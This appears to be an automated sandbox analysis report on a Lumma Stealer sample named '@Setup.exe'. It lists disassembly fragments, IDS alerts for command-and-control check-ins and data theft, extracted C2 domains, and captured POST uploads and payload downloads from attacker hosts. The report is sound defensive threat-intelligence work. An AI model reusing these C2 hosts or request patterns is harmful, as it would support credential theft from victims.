              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx eax, byte ptr [esp+04h]0_2_00909224
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]0_2_0092F26E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edi, dword ptr [esp+30h]0_2_0091639E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h0_2_0092D3E2
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ecx, eax0_2_0092D3E2
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov esi, eax0_2_009083EE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h0_2_0092F37E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp]0_2_009294CE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_00918437
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h0_2_0090E42E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edx, ecx0_2_00900582
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edx, eax0_2_00900582
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_0090C54F
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0091B56E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then jmp eax0_2_0091668D
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]0_2_0093068E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h0_2_0093068E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]0_2_009176BC
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]0_2_009173B6
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edx, eax0_2_0092D4A9
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then jmp edx0_2_009147DE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ecx, eax0_2_0091D713
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov eax, ecx0_2_009068D4
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then push esi0_2_009128C1
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]0_2_0093080E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h0_2_0093080E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0091C846
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ecx, eax0_2_0091A87E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]0_2_0091A87E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov esi, edx0_2_009089D9
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]0_2_009179FE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edx, eax0_2_00909925
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then jmp edx0_2_0092E92B
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ecx, eax0_2_0090E966
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ebp, dword ptr [esp+20h]0_2_0090696E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov eax, ebx0_2_00907A0F
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]0_2_00919A5E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]0_2_008FEB2A
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_008F8C0E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_008F8C0E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00906C33
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00906C33
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]0_2_0092CC38
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov word ptr [edx], cx0_2_0090AC25
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edi, ecx0_2_0090ED2E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov ecx, eax0_2_0092DD63
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx esi, word ptr [ecx]0_2_00905E8E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov edi, dword ptr [esp+54h]0_2_00919E0E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp al, 20h0_2_008F3E55
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]0_2_00908E60
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]0_2_0092CFE1
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh0_2_00928F5E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then push dword ptr [esp+04h]0_2_00928F5E

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49744 -> 172.67.166.49:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: laborersquei.click
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.208.58:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.166.49:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49747
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=72RT6UG4DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18108Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=91FJXP8SKHS67CAYYVUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VDL8KRYX6OBB6SYO1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20430Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GB2XT5HQKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7075Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JWWXZIDCMJAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1222Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y8ZKNG619S0MX99IOMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585180Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: laborersquei.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: laborersquei.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: @Setup.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
              Source: @Setup.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: @Setup.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
              Source: @Setup.exe, 00000000.00000003.2259753444.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, @Setup.exe, _isdecmp.dll.9.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: @Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, @Setup.exe, _isdecmp.dll.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: @Setup.exe, 00000000.00000003.2259753444.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
